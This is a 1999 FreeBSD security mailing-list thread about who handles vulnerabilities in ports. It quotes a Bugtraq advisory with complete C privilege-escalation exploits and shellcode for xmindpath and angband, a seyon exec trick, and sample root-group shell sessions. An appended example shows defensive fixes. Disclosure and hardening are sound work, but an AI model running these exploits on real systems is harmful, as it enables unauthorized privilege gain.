Date:      Wed, 01 Dec 1999 10:54:54 -0800
From:      "Jordan K. Hubbard" <jkh@zippy.cdrom.com>
To:        Bill Swingle <unfurl@dub.net>
Cc:        security@FreeBSD.ORG, btellier@usa.net
Subject:   Re: [btellier@USA.NET: Several FreeBSD-3.3 vulnerabilities] 
Message-ID:  <35686.944074494@zippy.cdrom.com>
In-Reply-To: Your message of "Wed, 01 Dec 1999 09:32:42 PST." <19991201093242.A71817@dub.net> 

> FreeBSD vulnerabilities are few and far between, and even fewer are
> published on Bugtraq. Having something as simple as this get past us is
> really embarassing. It says to the security community at large that
> we're not even concerned enough with security to fix these small holes.
> We all know that's not true. 

The problem is that they're often not even posted to the correct
source.  In this case, for example, the holes aren't "part of FreeBSD"
proper, they're part of our 2794 entry ports collection and
Mr. Tellier posted his report to the security officer.

It would be simply impossible for one or two people to track security
over all of FreeBSD and 2,700 3rd party packages (a certain percentage
of which aren't even testable at any given time due to patch creep,
tarball fennerization, bitrot, etc) and I don't blame the security
officer for wondering why these issues weren't brought up directly
with the ports team and/or the individual maintainers for these ports.
Being able to divide labor into reasonable (read: even marginally sane)
pieces is why we have a ports collection and ports maintainers.  Any
bug which is found with a port, be it a security issue or a full-on
crash, should be reported to the relevant maintainer so that he or she
can quickly commit a patch to the ports' patches directory and get
everyone past the issue as quickly as possible.

- Jordan

> 
> I'm not sure who dropped the ball here, and I'm not pointing fingers. I
> just hope that we can pull together in the future to avoid more of this.
> 
> (just my .04)
> 
> -Bill
> 
> ----- Forwarded message from Brock Tellier <btellier@USA.NET> -----
> 
> X-Mailer: USANET web-mailer (M3.4.0.33)
> Date:         Tue, 30 Nov 1999 16:08:29 MST
> Reply-To: Brock Tellier <btellier@USA.NET>
> From: Brock Tellier <btellier@USA.NET>
> Subject:      Several FreeBSD-3.3 vulnerabilities
> To: BUGTRAQ@SECURITYFOCUS.COM
> 
> Greetings,
> 
> RANT
> I've given the FreeBSD team about a month to get something official together.
> Maintainers were supposedly contacted, but no progress has been made.  As
> promised, here are the goods:
> 
> OVERVIEW
> Vulnerabilities in seyon, xmindpath and angband can be used to upgrade
> privileges.
> 
> BACKGROUND
> All of the vulnerabilities discussed herein are based on my work on
> FreeBSD 3.3-RELEASE. Each of the programs was installed with the
> default permissions given when unpacked with sysinstall. 
> These permissions are:
> -rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
> -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
> -r-xr-sr-x 1 bin games 481794 Sep 11 01:10 /usr/X11R6/bin/angband
> These programs may be installed on other systems with different
> permissions as a result of a version change or a different packing
> scheme.
> 
> DETAILS
>  
> Vuln #1 The Seyon Mess
>  
> To summarize: Seyon was supposedly not meant to run with additional
> privileges. There are numerous problems with seyon and I've probably not
> found all of them. They are:
>  
> Buffer Overflows:
>  1. $HOME
>  2. seyon -emulator $BUF
>  3. seyon -modems $BUF
>  4. many long text box input string overflows while in program
> Input Validation:
>  1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with
>  fullprivs (as noted in previous advisory)
>  2. seyon -emulator /program/to/execute/with/full/privs
>   
> These privileges might be upgradable to root if you are able to a.
> trojan a dialer-writable file or b. use a symlink attack to clobber .rhosts or
> similar c. snoop device i/o.
>  
> Vuln #2 xmindpath
> 
> /usr/X11R6/bin/xmindpath (suid uucp by default), contains a buffer
> overflow which will allow any user to gain uucp privs. Simply enough:
> xmindpath -f $BUF
> 
> See my "faxalter" advisory for more info on gaining root w/euid uucp.
>  
> Vuln #3 fun and egid games
>  
> Want to impress your friends with the highest tetris score known to man?
>  
> Gain egid games with a buffer overflow in /usr/X11R6/bin/angband. The
> overflows are:
>  angband -u$BUF
>  angband -d$BUF
>  
> EXPLOITS
>  
> Seyon:
> I've not written buffer overflow exploits for Seyon since an
> equivalent-yield program execution vulnerability exists, but it is
> certainly possible. The latter exploit is:
> seyon -emulator /program/to/execute
>  
> Note that you'll have to execute a program that will ignore the args
> that seyon passes to it automatically as shown:
>  
> bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
> bash-2.03$ gcc -o id id.c
> bash-2.03$ seyon -emulator ./id
> uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer),
> 1000(xnec)
>  
> xmindpath:
> bash-2.03$ ls -la `which xmindpath`; id
> -rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
> uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
> bash-2.03$ ./xmindx
> FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
> Brock Tellier btellier@usa.net
> Using addr: 0xbfbfcfa8
> bash-2.03$ xmindpath -f $RET
> lock open: File name too long
> $ id
> uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
> $
>  
> /*
>  *
>  * FreeBSD 3.3 xmindpath exploit gives euid uucp
>  * Compile: gcc -o xmindx xmindx.c
>  * Usage: ./xmindx <offset>
>  *        /path/to/xmindpath -f $RET
>  * Brock Tellier <btellier@usa.net>
>  *
>  */
>  
>  
>  #include <stdlib.h>
>  #include <stdio.h>
>  #include <string.h>   /* memset, memcpy, strlen */
>  
>  char shell[]= /* mudge@l0pht.com */
>  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
>  "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
>  "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
>  "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
>  
>  #define EGGLEN 2048   /* length of the $EGG environment value */
>  #define RETLEN 279    /* length of the $RET environment value */
>  #define ALIGN 3       /* byte offset at which the 4-byte addresses start */
>  #define NOP 0x90
> 
>  int main(int argc, char *argv[]) {
>  
>  long int offset=0;
>  int i;
>  int egglen = EGGLEN;
>  int retlen = RETLEN;
>  long int addr = 0xbfbfcfa8;
>  char egg[EGGLEN + 1];   /* +1 so the strings handed to putenv() are NUL-terminated */
>  char ret[RETLEN + 1];
>   
>  if (argc == 2) offset = atoi(argv[1]);
>  
>  addr=addr + offset;
>  
>  fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
>  fprintf(stderr, "Brock Tellier btellier@usa.net\n");
>  fprintf(stderr, "Using addr: 0x%lx\n", addr);
>   
>  /* $EGG: NOP padding with the shellcode at the end */
>  memset(egg,NOP,egglen);
>  memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));
>  egg[egglen] = '\0';
>   
>  /* $RET: the guessed address repeated every 4 bytes starting at ALIGN */
>  for(i=ALIGN;i< retlen;i+=4)
>  *(int *)&ret[i]=addr;
>  ret[retlen] = '\0';
>   
>  memcpy(egg, "EGG=", 4);
>  putenv(egg);
>  memcpy(ret,"RET=",4);
>  putenv(ret);
>   
>  /* start a shell whose environment now carries EGG and RET */
>  system("/usr/local/bin/bash");
>   
>  return 0;
>  }
>  
>  
> angband:
>  
> bash-2.03$ gcc -o angames angames.c
> bash-2.03$ angband `./angames`
> eip=0xbfbfc6b4 offset=0 buflen=1095
> NOPs to 1021
> Shellcode to 1088
> eip to 1092
> garbage to 1094
> $ id
> uid=1000(xnec) gid=1000(xnec) egid=13(games) groups=13(games), 1000(xnec)
> $ 
> 
> /* FreeBSD 3.3 angband exploit yields egid of group games
>  * usage: gcc -o angames angames.c
>  *        /path/to/angband `./angames <offset>`
>  * overflow is 1088bytes of NOP/Shellcode + 4bytes EIP +2bytes garbage
>  * Brock Tellier <btellier@usa.net>
>  */
> 
> 
> #include <stdio.h>
> #include <stdlib.h>   /* atoi */
> 
> char shell[]= /* mudge@l0pht.com */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
>  
>  
> int main (int argc, char *argv[] ) {
> int x = 0;
> int y = 0;
> int offset = 0;
> int bsize = 1095; /* 2bytes"-u" + overflowed buf's bytes + */
> char buf[bsize]; /* 4bytesEBP + 4bytesEIP + 2bytesGarbage */
> char arg[bsize + 2];
> unsigned int eip = 0xbfbfc6b4; /* FreeBSD 3.3; unsigned so the constant fits */
>  
> if (argc > 1) { 
> offset = atoi(argv[1]);
> eip = eip + offset;
> }
> fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
>  
> /* NOP padding, then the 67-byte shellcode */
> for ( x = 0; x < 1021; x++) buf[x] = 0x90;
> fprintf(stderr, "NOPs to %d\n", x);
>  
> for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
> fprintf(stderr, "Shellcode to %d\n",x);
>  
> /* return address, least significant byte first */
> buf[x++] = eip & 0x000000ff;
> buf[x++] = (eip & 0x0000ff00) >> 8;
> buf[x++] = (eip & 0x00ff0000) >> 16;
> buf[x++] = (eip & 0xff000000) >> 24;
> fprintf(stderr, "eip to %d\n",x);
> buf[x++] = 'X';
> buf[x++] = 'X';
> fprintf(stderr, "garbage to %d\n", x);
> 
> buf[bsize - 1] = '\0';
> 
> /* emit the finished "-u<payload>" argument on stdout */
> sprintf(arg, "-u%s", buf);
> arg[bsize + 1] = '\0';
>  
> printf("%s", arg);
>  
> return 0;
> }
> 
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
> 
> 
> ----- End forwarded message -----
> 
> -- 
> -=| --- B i l l   S w i n g l e --- http://www.dub.net/
> -=| unfurl@dub.net  - unfurl@freebsd.org - bill@cdrom.com 
> -=| Different all twisty a of in maze are you, passages little
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
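Added example, not code from this thread or from any of the ports it names: a hardened form of the two defects the advisory describes, a length-checked copy for argv-supplied options such as -u<name> (the same applies to -f and $HOME), and dropping a setgid/setuid identity before running a user-chosen helper by absolute path, as the seyon -emulator and $PATH cases call for. The buffer size, function names and the "-u" parsing are assumptions.

```c
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define NAME_SZ 32   /* assumed size of the program's fixed name buffer */

/* Checked replacement for the unchecked strcpy() pattern behind the
 * -u$BUF / -f $BUF / $HOME findings: refuse input that does not fit
 * (including its NUL) instead of truncating silently or overflowing.
 * Returns 0 on success, -1 if the input is too long. */
int set_name_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Parse an "-u<name>" argument into a fixed buffer via the checked copy. */
int parse_user_opt(const char *arg, char *name, size_t namesz)
{
    if (strncmp(arg, "-u", 2) != 0 || arg[2] == '\0')
        return -1;
    return set_name_checked(name, namesz, arg + 2);
}

/* Give up a setuid/setgid identity permanently and verify the drop took
 * effect; gid is dropped first because setgid() needs the privileged uid. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    if (getegid() != getgid() || geteuid() != getuid())
        return -1;
    return 0;
}

/* The -emulator case: run a user-chosen helper only by absolute path (no
 * $PATH search) and only after privileges are dropped. Returns -1 on failure. */
int run_helper_unprivileged(const char *path)
{
    if (path == NULL || path[0] != '/' || drop_privileges() != 0)
        return -1;
    execl(path, path, (char *)NULL);
    return -1;   /* reached only if execl() failed */
}
```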